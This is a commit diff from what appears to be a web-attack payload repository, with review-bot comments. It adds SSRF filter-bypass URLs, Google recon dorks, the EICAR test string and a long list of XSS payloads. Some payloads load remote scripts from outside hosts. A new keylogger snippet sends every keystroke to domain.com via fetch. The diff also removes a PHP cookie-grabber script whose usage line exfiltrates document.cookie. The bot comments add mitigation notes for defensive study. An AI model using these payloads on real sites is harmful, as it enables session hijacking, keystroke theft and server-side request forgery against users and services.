XSS Intruder + Eicar + SSRF http://0
@ -18,10 +18,11 @@ knockpy domain.com -w subdomains-top1mil-110000.txt
|
|||||||
* Using Google Dorks and Google Transparency Report
|
* Using Google Dorks and Google Transparency Report
|
||||||
```bash
|
```bash
|
||||||
site:*.domain.com -www
|
site:*.domain.com -www
|
||||||
site:http://domain.com filetype:pdf
|
site:domain.com filetype:pdf
|
||||||
site:http://domain.com inurl:&
|
site:domain.com inurl:'&'
|
||||||
site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
|
site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
|
||||||
site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
|
site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
|
||||||
|
site:*.*.domain.com
|
||||||
|
|
||||||
You need to include subdomains ;)
|
You need to include subdomains ;)
|
||||||
https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
|
https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
|
||||||
|
@ -28,7 +28,7 @@ Advanced exploit using type=url
|
|||||||
```
|
```
|
||||||
Change "type=file" to "type=url"
|
Change "type=file" to "type=url"
|
||||||
Paste URL in text field and hit enter
|
Paste URL in text field and hit enter
|
||||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
```
|
```
|
||||||
|
|
||||||
## Bypassing
|
## Bypassing
|
||||||
@ -58,5 +58,20 @@ localhost:+11211aaa
|
|||||||
localhost:00011211aaaa
|
localhost:00011211aaaa
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using rare address
|
||||||
|
```
|
||||||
|
http://0/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using tricks combination
|
||||||
|
```
|
||||||
|
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||||
|
urllib2 : 1.1.1.1
|
||||||
|
requests + browsers : 2.2.2.2
|
||||||
|
urllib : 3.3.3.3
|
||||||
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
|
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
|
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||||
|
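Review bot: The `http://0/` and `http://1.1.1.1 &@2.2.2.2# @3.3.3.3/` entries are added without saying why they get past a filter or what a correct filter looks like, which is the one thing a reader of a "Bypassing" section needs. Both defeat checks that pattern-match the URL string: `0` is typically treated by the network stack as a local address, and the second URL is parsed differently by urllib2, requests and urllib, so a validator using one library and a fetcher using another disagree on the host. I would add after the `urllib : 3.3.3.3` line a short line such as: `Defence: resolve the hostname first and check the resulting IP against an allowlist (re-checking after every redirect), and use the same URL parser for validation and for the actual request.` Separately, in the first hunk the Transparency Report link reads `#domain=[DOMAIN]g&incl_exp=true`; the `g` directly after the placeholder looks stray — confirm against the live URL before keeping it.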
1
Upload insecure files/Eicar/eicar.com.txt
Normal file
@ -0,0 +1 @@
|
|||||||
|
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
|
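Review bot: The new `Upload insecure files/Eicar/eicar.com.txt` contains only the test string and nothing in this commit says what it is for, so its purpose belongs in that section's README. Something like: `eicar.com.txt holds the EICAR anti-malware test string; upload it to check whether the target scans uploaded files — note that cloning this repository may raise an antivirus alert on this file.` Keep the file to the bare string: the EICAR specification tolerates trailing whitespace up to a total of 128 bytes, but any other extra bytes stop scanners from recognising it, so a stray character added by an editor would silently make the test useless.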
@ -1,11 +0,0 @@
|
|||||||
<?php
|
|
||||||
// How to use it
|
|
||||||
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
|
||||||
|
|
||||||
// Write the cookie in a file
|
|
||||||
$cookie = $_GET['c'];
|
|
||||||
$fp = fopen('cookies.txt', 'a+');
|
|
||||||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
|
||||||
fclose($fp);
|
|
||||||
|
|
||||||
?>
|
|
Before Width: | Height: | Size: 379 B After Width: | Height: | Size: 379 B |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 12 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 12 KiB |
@ -6,78 +6,78 @@
|
|||||||
'-alert(1)//
|
'-alert(1)//
|
||||||
\'-alert(1)//
|
\'-alert(1)//
|
||||||
</script><svg onload=alert(1)>
|
</script><svg onload=alert(1)>
|
||||||
<x contenteditable onblur=alert(1)>lose focus!
|
<x contenteditable onblur=alert(1)>lose focus!
|
||||||
<x onclick=alert(1)>click this!
|
<x onclick=alert(1)>click this!
|
||||||
<x oncopy=alert(1)>copy this!
|
<x oncopy=alert(1)>copy this!
|
||||||
<x oncontextmenu=alert(1)>right click this!
|
<x oncontextmenu=alert(1)>right click this!
|
||||||
<x oncut=alert(1)>copy this!
|
<x oncut=alert(1)>copy this!
|
||||||
<x ondblclick=alert(1)>double click this!
|
<x ondblclick=alert(1)>double click this!
|
||||||
<x ondrag=alert(1)>drag this!
|
<x ondrag=alert(1)>drag this!
|
||||||
<x contenteditable onfocus=alert(1)>focus this!
|
<x contenteditable onfocus=alert(1)>focus this!
|
||||||
<x contenteditable oninput=alert(1)>input here!
|
<x contenteditable oninput=alert(1)>input here!
|
||||||
<x contenteditable onkeydown=alert(1)>press any key!
|
<x contenteditable onkeydown=alert(1)>press any key!
|
||||||
<x contenteditable onkeypress=alert(1)>press any key!
|
<x contenteditable onkeypress=alert(1)>press any key!
|
||||||
<x contenteditable onkeyup=alert(1)>press any key!
|
<x contenteditable onkeyup=alert(1)>press any key!
|
||||||
<x onmousedown=alert(1)>click this!
|
<x onmousedown=alert(1)>click this!
|
||||||
<x onmousemove=alert(1)>hover this!
|
<x onmousemove=alert(1)>hover this!
|
||||||
<x onmouseout=alert(1)>hover this!
|
<x onmouseout=alert(1)>hover this!
|
||||||
<x onmouseover=alert(1)>hover this!
|
<x onmouseover=alert(1)>hover this!
|
||||||
<x onmouseup=alert(1)>click this!
|
<x onmouseup=alert(1)>click this!
|
||||||
<x contenteditable onpaste=alert(1)>paste here!
|
<x contenteditable onpaste=alert(1)>paste here!
|
||||||
<script>alert(1)//
|
<script>alert(1)//
|
||||||
<script>alert(1)<!–
|
<script>alert(1)<!–
|
||||||
<script src=//brutelogic.com.br/1.js>
|
<script src=//brutelogic.com.br/1.js>
|
||||||
<script src=//3334957647/1>
|
<script src=//3334957647/1>
|
||||||
%3Cx onxxx=alert(1)
|
%3Cx onxxx=alert(1)
|
||||||
<%78 onxxx=1
|
<%78 onxxx=1
|
||||||
<x %6Fnxxx=1
|
<x %6Fnxxx=1
|
||||||
<x o%6Exxx=1
|
<x o%6Exxx=1
|
||||||
<x on%78xx=1
|
<x on%78xx=1
|
||||||
<x onxxx%3D1
|
<x onxxx%3D1
|
||||||
<X onxxx=1
|
<X onxxx=1
|
||||||
<x OnXxx=1
|
<x OnXxx=1
|
||||||
<X OnXxx=1
|
<X OnXxx=1
|
||||||
<x onxxx=1 onxxx=1
|
<x onxxx=1 onxxx=1
|
||||||
<x/onxxx=1
|
<x/onxxx=1
|
||||||
<x%09onxxx=1
|
<x%09onxxx=1
|
||||||
<x%0Aonxxx=1
|
<x%0Aonxxx=1
|
||||||
<x%0Conxxx=1
|
<x%0Conxxx=1
|
||||||
<x%0Donxxx=1
|
<x%0Donxxx=1
|
||||||
<x%2Fonxxx=1
|
<x%2Fonxxx=1
|
||||||
<x 1='1'onxxx=1
|
<x 1='1'onxxx=1
|
||||||
<x 1="1"onxxx=1
|
<x 1="1"onxxx=1
|
||||||
<x </onxxx=1
|
<x </onxxx=1
|
||||||
<x 1=">" onxxx=1
|
<x 1=">" onxxx=1
|
||||||
<http://onxxx%3D1/
|
<http://onxxx%3D1/
|
||||||
<x onxxx=alert(1) 1='
|
<x onxxx=alert(1) 1='
|
||||||
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
|
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
|
||||||
'onload=alert(1)><svg/1='
|
'onload=alert(1)><svg/1='
|
||||||
'>alert(1)</script><script/1='
|
'>alert(1)</script><script/1='
|
||||||
*/alert(1)</script><script>/*
|
*/alert(1)</script><script>/*
|
||||||
*/alert(1)">'onload="/*<svg/1='
|
*/alert(1)">'onload="/*<svg/1='
|
||||||
`-alert(1)">'onload="`<svg/1='
|
`-alert(1)">'onload="`<svg/1='
|
||||||
*/</script>'>alert(1)/*<script/1='
|
*/</script>'>alert(1)/*<script/1='
|
||||||
<script>alert(1)</script>
|
<script>alert(1)</script>
|
||||||
<script src=javascript:alert(1)>
|
<script src=javascript:alert(1)>
|
||||||
<iframe src=javascript:alert(1)>
|
<iframe src=javascript:alert(1)>
|
||||||
<embed src=javascript:alert(1)>
|
<embed src=javascript:alert(1)>
|
||||||
<a href=javascript:alert(1)>click
|
<a href=javascript:alert(1)>click
|
||||||
<math><brute href=javascript:alert(1)>click
|
<math><brute href=javascript:alert(1)>click
|
||||||
<form action=javascript:alert(1)><input type=submit>
|
<form action=javascript:alert(1)><input type=submit>
|
||||||
<isindex action=javascript:alert(1) type=submit value=click>
|
<isindex action=javascript:alert(1) type=submit value=click>
|
||||||
<form><button formaction=javascript:alert(1)>click
|
<form><button formaction=javascript:alert(1)>click
|
||||||
<form><input formaction=javascript:alert(1) type=submit value=click>
|
<form><input formaction=javascript:alert(1) type=submit value=click>
|
||||||
<form><input formaction=javascript:alert(1) type=image value=click>
|
<form><input formaction=javascript:alert(1) type=image value=click>
|
||||||
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
|
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
|
||||||
<isindex formaction=javascript:alert(1) type=submit value=click>
|
<isindex formaction=javascript:alert(1) type=submit value=click>
|
||||||
<object data=javascript:alert(1)>
|
<object data=javascript:alert(1)>
|
||||||
<iframe srcdoc=<svg/onload=alert(1)>>
|
<iframe srcdoc=<svg/onload=alert(1)>>
|
||||||
<svg><script xlink:href=data:,alert(1) />
|
<svg><script xlink:href=data:,alert(1) />
|
||||||
<math><brute xlink:href=javascript:alert(1)>click
|
<math><brute xlink:href=javascript:alert(1)>click
|
||||||
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
|
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
|
||||||
<html ontouchstart=alert(1)>
|
<html ontouchstart=alert(1)>
|
||||||
<html ontouchend=alert(1)>
|
<html ontouchend=alert(1)>
|
||||||
<html ontouchmove=alert(1)>
|
<html ontouchmove=alert(1)>
|
||||||
<html ontouchcancel=alert(1)>
|
<html ontouchcancel=alert(1)>
|
||||||
<body onorientationchange=alert(1)>
|
<body onorientationchange=alert(1)>
|
||||||
"><img src=1 onerror=alert(1)>.gif
|
"><img src=1 onerror=alert(1)>.gif
|
||||||
@ -85,9 +85,9 @@
|
|||||||
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||||
<script src="data:,alert(1)//
|
<script src="data:,alert(1)//
|
||||||
"><script src=data:,alert(1)//
|
"><script src=data:,alert(1)//
|
||||||
<script src="//brutelogic.com.br/1.js#
|
<script src="//brutelogic.com.br/1.js#
|
||||||
"><script src=//brutelogic.com.br/1.js#
|
"><script src=//brutelogic.com.br/1.js#
|
||||||
<link rel=import href="data:text/html,<script>alert(1)</script>
|
<link rel=import href="data:text/html,<script>alert(1)</script>
|
||||||
"><link rel=import href=data:text/html,<script>alert(1)</script>
|
"><link rel=import href=data:text/html,<script>alert(1)</script>
|
||||||
<base href=//0>
|
<base href=//0>
|
||||||
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
|
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
|
||||||
@ -97,9 +97,6 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
|||||||
<body onhashchange=alert(1)><a href=#x>click this!#x
|
<body onhashchange=alert(1)><a href=#x>click this!#x
|
||||||
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
|
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
|
||||||
<body onscroll=alert(1)><br><br><br><br>
|
<body onscroll=alert(1)><br><br><br><br>
|
||||||
<br><br><br><br><br><br><br><br><br><br>
|
|
||||||
<br><br><br><br><br><br><br><br><br><br>
|
|
||||||
<br><br><br><br><br><br><x id=x>#x
|
|
||||||
<body onresize=alert(1)>press F12!
|
<body onresize=alert(1)>press F12!
|
||||||
<body onhelp=alert(1)>press F1! (MSIE)
|
<body onhelp=alert(1)>press F1! (MSIE)
|
||||||
<marquee onstart=alert(1)>
|
<marquee onstart=alert(1)>
|
Before Width: | Height: | Size: 4.1 KiB After Width: | Height: | Size: 3.9 KiB |
@ -1,4 +1,3 @@
|
|||||||
# credit to rsnake
|
|
||||||
<SCRIPT>alert('XSS');</SCRIPT>
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
'';!--"<XSS>=&{()}
|
'';!--"<XSS>=&{()}
|
||||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
@ -18,6 +18,11 @@ fclose($fp);
|
|||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Keylogger for XSS
|
||||||
|
```
|
||||||
|
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
||||||
|
```
|
||||||
|
|
||||||
## XSS in HTML/Applications
|
## XSS in HTML/Applications
|
||||||
XSS Basic
|
XSS Basic
|
||||||
```
|
```
|
||||||
|
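Review bot: The `Keylogger for XSS` line that opens the new block is plain text while the neighbouring sections use `## ...` headings, so it should be a heading (`## Keylogger for XSS`) to keep the README's structure consistent. The snippet also lacks a sentence on what it demonstrates and how it is stopped; since the `fetch("http://domain.com?k=...")` call is the exfiltration channel, I would add under the fence: `Mitigation: a Content-Security-Policy with a restrictive connect-src blocks the fetch() call; HttpOnly cookies do not help here because keystrokes, not cookies, are taken.` For detection it is worth noting that `this.remove()` deletes the `<img>` once the handler is installed, so inspecting the DOM afterwards will not show the injected element — the hook lives on `document.onkeypress`.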